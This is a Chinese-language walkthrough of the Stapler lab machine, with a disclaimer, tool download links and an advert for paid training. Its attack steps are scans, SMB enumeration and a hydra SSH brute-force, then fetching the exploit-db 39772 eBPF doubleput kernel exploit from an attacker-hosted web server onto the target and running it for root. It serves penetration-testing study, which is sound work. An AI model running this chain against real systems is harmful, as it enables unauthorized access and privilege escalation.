靶场奇妙记之Stapler

公众号：泷羽Sec-Ceo

声明！
        学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下，如涉及侵权马上删除文章，笔记只是方便各位师傅的学习和探讨，文章所提到的网站以及内容，只做学习交流，其他均与本人以及泷羽sec团队无关，切勿触碰法律底线，否则后果自负！！！！有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)

系统和工具

        链接：https://pan.quark.cn/s/7c366373a85e
                提取码：5cuD

        链接：https://pan.baidu.com/s/1Rn7mA_-aEh60L_iX4PWjzg?pwd=2w25 
                提取码：2w25
        解压密码：SecCeo或Sec工具

        

        所提供的工具资料仅供学习之用。这些资料旨在帮助用户增进知识、提升技能，并促进个人成长与学习。用户在使用这些资料时，应严格遵守相关法律法规，不得将其用于任何非法、欺诈、侵权或其他不当用途。本人和团队不对用户因使用这些资料而产生的任何后果负责，包括但不限于因操作不当、误解资料内容或违反法律法规而导致的损失或损害。用户应自行承担使用这些资料的风险，并在使用前进行充分的了解和评估。

        团队目前在筹备OSCP+的培训，费用4000，跟其他培训比，泷羽Sec绝对优惠，泷羽Sec的泷老师，是一名资深高级红队队长，拥有OSEP，CISSP，OSCP等等含金量极高的证书。报名可以在”泷羽Sec-Ceo“咨询一下

突破边界

主机发现

nmap -sP 192.168.20.0/24

       Nmap scan report for 192.168.20.152

扫描端口

nmap -sV -p 1-65535 192.168.20.152

       20/tcp    closed ftp-data

       21/tcp    open   ftp         vsftpd 2.0.8 or later

       22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

       53/tcp    open   domain      dnsmasq 2.75

       80/tcp    open   http        PHP cli server 5.5 or later

       123/tcp   closed ntp

       137/tcp   closed netbios-ns

       138/tcp   closed netbios-dgm

       139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

       666/tcp   open   doom?

       3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1

       12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))

枚举smb

enum4linux -a 192.168.20.152

       可访问目录

       //192.168.20.152/kathy  Mapping: OK Listing: OK Writing: N/A

       //192.168.20.152/tmp    Mapping: OK Listing: OK Writing: N/A

        用户

筛选用户

复制到user.txt

vi user.txt

cat user.txt | cut -d '\' -f2 | cut -d ' ' -f1 >user2.txt

爆破ssh

hydra -L user2.txt -P user2.txt 192.168.20.152 ssh

       [22][ssh] host: 192.168.20.152   login: SHayslett   password: SHayslett

ssh登录

ssh SHayslett@192.168.20.152

提权

查看系统信息

uname -a

        Linux 4.4.0-21

查找漏洞

searchsploit linux 4.4

searchsploit linux 4.4 -m 39772

查看文件

cat 39772.txt

下载文件

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

传输文件

service apache2 start

cp 39772.zip /var/www/html

目标主机下载文件

wget http://192.168.20.102/39772.zip

解压文件

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit/

添加权限

chmod 777 compile.sh

chmod 777 doubleput.c

chmod 777 hello.c

chmod 777 suidhelper.c

提权

        执行compile.sh

./compile.sh

       生成doubleput

        执行doubleput

./doubleput

提权成功